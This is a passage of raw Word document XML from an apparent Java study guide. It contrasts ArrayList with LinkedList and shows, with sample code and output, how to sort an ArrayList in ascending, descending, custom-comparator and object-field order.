    <w:p w14:paraId="6E3ED992" w14:textId="77777777" w:rsidR="00FC7EFA" w:rsidRPr="00CE4B95" w:rsidRDefault="00FC7EFA" w:rsidP="009E5CF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7C2DA468" w14:textId="77777777" w:rsidR="00FC7EFA" w:rsidRPr="00CE4B95" w:rsidRDefault="00FC7EFA" w:rsidP="009E5CFE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="73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is better when you need fast </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>random access</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and mostly add/remove elements at the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>end</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of the list.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E09190C" w14:textId="77777777" w:rsidR="00FC7EFA" w:rsidRPr="00CE4B95" w:rsidRDefault="00FC7EFA" w:rsidP="009E5CFE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="73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is better when you need </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>frequent insertions and deletions</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> at the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>beginning</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middle</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of the list.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65EFF27C" w14:textId="71F9A135"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D6976A7">
          <v:rect id="_x0000_i1492" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C9F7AF6" w14:textId="77777777" w:rsidR="00127D9B" w:rsidRPr="00CE4B95" w:rsidRDefault="00127D9B">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="149" w:name="_Toc196307629"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How to sort the ArrayList?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="149"/>
    </w:p>
    <w:p w14:paraId="76B9D886" w14:textId="35112EC0" w:rsidR="004B6BBD" w:rsidRPr="00CE4B95" w:rsidRDefault="004B6BBD" w:rsidP="00D60CE8">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o </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>sort an ArrayList</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Java, you can use the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Collections.sort()</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> method or the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>List.sort()</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> method (for Java 8 and later). The sorting can be done in </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ascending</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descending</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> order, and you can also customize the sorting order using a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Comparator</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52B48204" w14:textId="77777777" w:rsidR="004B6BBD" w:rsidRPr="00CE4B95" w:rsidRDefault="004B6BBD" w:rsidP="00D60CE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Sorting in Ascending Order using Collections.sort()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71ECBEAC"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Collections.sort()</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> method sorts the elements of the list in </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ascending order</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> according to their natural order.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="225BC9EB" w14:textId="77777777" w:rsidR="004B6BBD" w:rsidRPr="00CE4B95" w:rsidRDefault="004B6BBD" w:rsidP="00D60CE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365DF28C"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List;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D2EA4D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Collections;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1176F752" w14:textId="77777777" w:rsidR="004B6BBD" w:rsidRPr="00CE4B95" w:rsidRDefault="004B6BBD" w:rsidP="00D60CE8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1BFABA24"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ortArrayList {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CC3B723"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7B55C587"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e an ArrayList</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2487CA26"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rrayList&lt;Integer&gt; list = new ArrayList&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0862E242"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5);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="548EB845"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2);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0240150C"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8);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F742900"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1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5655D552"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5E57FFC"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orting the ArrayList in ascending order</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="406BAE2E"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ions.sort(list);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E05E70F"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37E2E2C"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nting the sorted ArrayList</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ABE346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orted ArrayList: " + list);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DED859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C2B162D"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BFE7CCA"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utput:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D060CF4"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orted ArrayList: [1, 2, 5, 8]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C2BAFA1" w14:textId="77777777" w:rsidR="004B6BBD" w:rsidRPr="00CE4B95" w:rsidRDefault="004B6BBD" w:rsidP="00D60CE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Sorting in Descending Order using Collections.sort() and Collections.reverseOrder()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22FD75CD"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o sort in </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>descending order</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, you can pass </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Collections.reverseOrder()</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> as a comparator to the sort() method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="709D09CB" w14:textId="77777777" w:rsidR="004B6BBD" w:rsidRPr="00CE4B95" w:rsidRDefault="004B6BBD" w:rsidP="00D60CE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538DA628"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List;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C2C3EA5"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Collections;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="486C3248" w14:textId="77777777" w:rsidR="004B6BBD" w:rsidRPr="00CE4B95" w:rsidRDefault="004B6BBD" w:rsidP="00D60CE8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79D1D52F"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ortArrayListDescending {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01EC74E6"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public static void main(String[] args) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="674D42BD"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e an ArrayList</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A064CCB"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rrayList&lt;Integer&gt; list = new ArrayList&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EBCC316"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5);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A951DCD"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2);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35A5103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8);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="186C30E1"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1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="099BD6DF"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A8EE627"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orting the ArrayList in descending order</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17204867"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ions.sort(list, Collections.reverseOrder());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C864FEA"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7B49C33"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nting the sorted ArrayList</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46D9225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orted ArrayList in Descending Order: " + list);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="130797A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551F461"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418F9BD"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utput:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D31B2F5"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orted ArrayList in Descending Order: [8, 5, 2, 1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56AB3F0A" w14:textId="77777777" w:rsidR="004B6BBD" w:rsidRPr="00CE4B95" w:rsidRDefault="004B6BBD" w:rsidP="00D60CE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Sorting using List.sort() (Java 8 and Later)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="029E3AE7"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8 and later, you can use the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>List.sort()</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> method, which internally uses the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Comparator</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B466259" w14:textId="77777777" w:rsidR="004B6BBD" w:rsidRPr="00CE4B95" w:rsidRDefault="004B6BBD" w:rsidP="00D60CE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2637AD2E"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List;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40FB74B3"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st;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09B8CE0F" w14:textId="77777777" w:rsidR="004B6BBD" w:rsidRPr="00CE4B95" w:rsidRDefault="004B6BBD" w:rsidP="00D60CE8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11C5DB23"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ortArrayListUsingListSort {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E747E57"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061FCB64"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e an ArrayList</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CCA7181"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Integer&gt; list = new ArrayList&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D7121DA"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5);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="082C86AF"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2);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F379CED"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8);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="038BF02A"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1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A893A5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D903FEC"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orting the ArrayList in ascending order</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51F1278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sort(Integer::compareTo);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B8694B4"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5038060"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nting the sorted ArrayList</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5260CB8D"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orted ArrayList: " + list);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="666DB08B"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91AB9E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15AEB53"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utput:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0802942A"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orted ArrayList: [1, 2, 5, 8]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65FACDE5" w14:textId="77777777" w:rsidR="004B6BBD" w:rsidRPr="00CE4B95" w:rsidRDefault="004B6BBD" w:rsidP="00D60CE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Sorting with a Custom Comparator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61B9C4B3"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can also define a custom sorting order by implementing a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Comparator</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. For example, sorting in descending order using a custom comparator.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EBBE032" w14:textId="77777777" w:rsidR="004B6BBD" w:rsidRPr="00CE4B95" w:rsidRDefault="004B6BBD" w:rsidP="00D60CE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7894977B"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List;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7784482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Collections;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28D13E1D"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Comparator;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E48A3B1" w14:textId="77777777" w:rsidR="004B6BBD" w:rsidRPr="00CE4B95" w:rsidRDefault="004B6BBD" w:rsidP="00D60CE8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43BCB03E"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ortArrayListCustomComparator {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38C20694"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06831D42"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e an ArrayList</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F061702"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rrayList&lt;Integer&gt; list = new ArrayList&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57ADA41B"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5);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B7D8DBB"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2);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AB30451"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8);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20B978E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list.add(1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06604230"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5D7E01D"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orting the ArrayList in descending order using a custom comparator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35BD869D"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sort(new Comparator&lt;Integer&gt;() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42E1F2DA"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712E696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int compare(Integer o1, Integer o2) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C8EE7A5"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o2 - o1;  // Descending order</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31595A37"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BE6CF70"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0B0E542"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D58128E"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nting the sorted ArrayList</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46CCBBE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orted ArrayList with Custom Comparator: " + list);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3751A9D2"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2EC9E67"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A85A956"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utput:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54BE32DD"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orted ArrayList with Custom Comparator: [8, 5, 2, 1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FB23456" w14:textId="77777777" w:rsidR="004B6BBD" w:rsidRPr="00CE4B95" w:rsidRDefault="004B6BBD" w:rsidP="00D60CE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Sorting a List of Custom Objects</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="128E77E0"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you have a list of custom objects (e.g., Employee objects), you can sort them using a Comparator based on one or more fields of the object.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E997B6D" w14:textId="77777777" w:rsidR="004B6BBD" w:rsidRPr="00CE4B95" w:rsidRDefault="004B6BBD" w:rsidP="00D60CE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6121077F"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List;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B297990"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Collections;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11296EC5"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Comparator;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D8B2CCA" w14:textId="77777777" w:rsidR="004B6BBD" w:rsidRPr="00CE4B95" w:rsidRDefault="004B6BBD" w:rsidP="00D60CE8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F424E8C"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Employee {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DCC32CB"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name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DC558BB"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age;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46E9E69C"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640BF13"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mployee(String name, int age) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CEEEB8E"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name = name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04CF9482"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age = age;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A81049D"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29AB628"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44ADC11"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76E97993"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ring toString() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75E9F0EA"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name + " (" + age + ")";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ACC2C3B"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5C9AA92"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4A1ACC2" w14:textId="77777777" w:rsidR="004B6BBD" w:rsidRPr="00CE4B95" w:rsidRDefault="004B6BBD" w:rsidP="00D60CE8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="596D62EB"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ortCustomObjects {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5478C668"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38607958"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rrayList&lt;Employee&gt; employees = new ArrayList&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="681BFE95"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mployees.add(new Employee("John", 25));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15027D43"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mployees.add(new Employee("Alice", 30));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B8C32BB"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mployees.add(new Employee("Bob", 22));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C82FD08"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8321895"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orting by age (ascending)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34E615EC"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ions.sort(employees, Comparator.comparingInt(emp -&gt; emp.age));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79E3DA12"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531CE7D"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nting the sorted list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52CB6541"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orted Employees by Age: " + employees);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FF85244"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478EADF"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DD743A1"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utput:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="064A506F"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orted Employees by Age: [Bob (22), John (25), Alice (30)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BFC56BD" w14:textId="77777777" w:rsidR="004B6BBD" w:rsidRPr="00CE4B95" w:rsidRDefault="004B6BBD" w:rsidP="00D60CE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4A987524" w14:textId="77777777" w:rsidR="004B6BBD" w:rsidRPr="00CE4B95" w:rsidRDefault="004B6BBD" w:rsidP="00D60CE8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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Use </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Collections.sort()</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List.sort()</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
